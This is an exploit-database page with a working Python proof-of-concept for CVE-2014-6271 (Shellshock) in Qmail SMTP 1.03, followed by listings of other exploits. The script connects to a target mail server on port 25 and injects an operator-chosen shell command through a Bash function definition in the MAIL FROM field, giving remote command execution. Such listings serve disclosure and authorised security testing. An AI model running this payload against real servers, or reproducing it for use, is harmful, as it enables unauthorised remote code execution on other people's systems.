Become a patron and gain access to the dashboard, Schedule scans, API and Search

Search for hundreds of thousands of exploits

"Qmail SMTP 1.03 - Bash Environment Variable Injection"

Author

Exploit author

1F98D

Platform

Exploit platform

multiple

Release date

Exploit published date

2020-07-08

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
# Exploit Title: Qmail SMTP 1.03 - Bash Environment Variable Injection
# Date: 2020-07-03
# Exploit Author: 1F98D
# Original Authors: Mario Ledo, Mario Ledo, Gabriel Follon
# Version: Qmail 1.03
# Tested on: Debian 9.11 (x64)
# CVE: CVE-2014-6271
# References:
# http://seclists.org/oss-sec/2014/q3/649
# https://lists.gt.net/qmail/users/138578
#
# Qmail is vulnerable to a Shellshock vulnerability due to lack of validation
# in the MAIL FROM field.
#
#!/usr/local/bin/python3

from socket import *
import sys

if len(sys.argv) != 4:
    print('Usage {} <target ip> <email adress> <command>'.format(sys.argv[0]))
    print("E.g. {} 127.0.0.1 'root@debian' 'touch /tmp/x'".format(sys.argv[0]))
    sys.exit(1)

TARGET = sys.argv[1]
MAILTO = sys.argv[2]
CMD = sys.argv[3]

s = socket(AF_INET, SOCK_STREAM)
s.connect((TARGET, 25))

res = s.recv(1024)
if 'ESMTP' not in str(res):
    print('[!] No ESMTP detected')
    print('[!] Received {}'.format(str(res)))
    print('[!] Exiting...')
    sys.exit(1)

print('[*] ESMTP detected')
s.send(b'HELO x\r\n')
res = s.recv(1024)
if '250' not in str(res):
    print('[!] Error connecting, expected 250')
    print('[!] Received: {}'.format(str(res)))
    print('[!] Exiting...')
    sys.exit(1)

print('[*] Connected, sending payload')
s.send(bytes("MAIL FROM:<() {{ :; }}; {}>\r\n".format(CMD), 'utf-8'))
res = s.recv(1024)
if '250' not in str(res):
    print('[!] Error sending payload, expected 250')
    print('[!] Received: {}'.format(str(res)))
    print('[!] Exiting...')
    sys.exit(1)

print('[*] Payload sent')
s.send(bytes('RCPT TO:<{}>\r\n'.format(MAILTO), 'utf-8'))
s.recv(1024)
s.send(b'DATA\r\n')
s.recv(1024)
s.send(b'\r\nxxx\r\n.\r\n')
s.recv(1024)
s.send(b'QUIT\r\n')
s.recv(1024)
print('[*] Done')
Release Date Title Type Platform Author
2020-10-20 "WordPress Plugin Colorbox Lightbox v1.1.1 - Persistent Cross-Site Scripting (Authenticated)" webapps multiple n1x_
2020-10-14 "NodeBB Forum 1.12.2-1.14.2 - Account Takeover" webapps multiple "Muhammed Eren Uygun"
2020-10-12 "Liman 0.7 - Cross-Site Request Forgery (Change Password)" webapps multiple "George Tsimpidas"
2020-10-05 "MOVEit Transfer 11.1.1 - 'token' Unauthenticated SQL Injection" webapps multiple "Aviv Beniash"
2020-09-28 "Joplin 1.0.245 - Arbitrary Code Execution (PoC)" webapps multiple "Ademar Nowasky Junior"
2020-09-25 "B-swiss 3 Digital Signage System 3.6.5 - Database Disclosure" webapps multiple LiquidWorm
2020-09-25 "B-swiss 3 Digital Signage System 3.6.5 - Cross-Site Request Forgery (Add Maintenance Admin)" webapps multiple LiquidWorm
2020-09-22 "Comodo Unified Threat Management Web Console 2.7.0 - Remote Code Execution" webapps multiple "Milad Fadavvi"
2020-09-21 "B-swiss 3 Digital Signage System 3.6.5 - Remote Code Execution" webapps multiple LiquidWorm
2020-09-18 "SpamTitan 7.07 - Remote Code Execution (Authenticated)" webapps multiple "Felipe Molina"
Release Date Title Type Platform Author
2020-07-08 "Qmail SMTP 1.03 - Bash Environment Variable Injection" remote multiple 1F98D
2020-03-11 "TeamCity Agent XML-RPC 10.0 - Remote Code Execution" webapps php 1F98D
2020-01-30 "OpenSMTPD 6.6.2 - Remote Code Execution" remote linux 1F98D
2020-01-23 "Pachev FTP Server 1.0 - Path Traversal" remote linux 1F98D
2019-12-20 "FreeSWITCH 1.10.1 - Command Execution" remote windows 1F98D
import requests
response = requests.get('https://www.nmmapper.com/api/v1/exploitdetails/48651/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.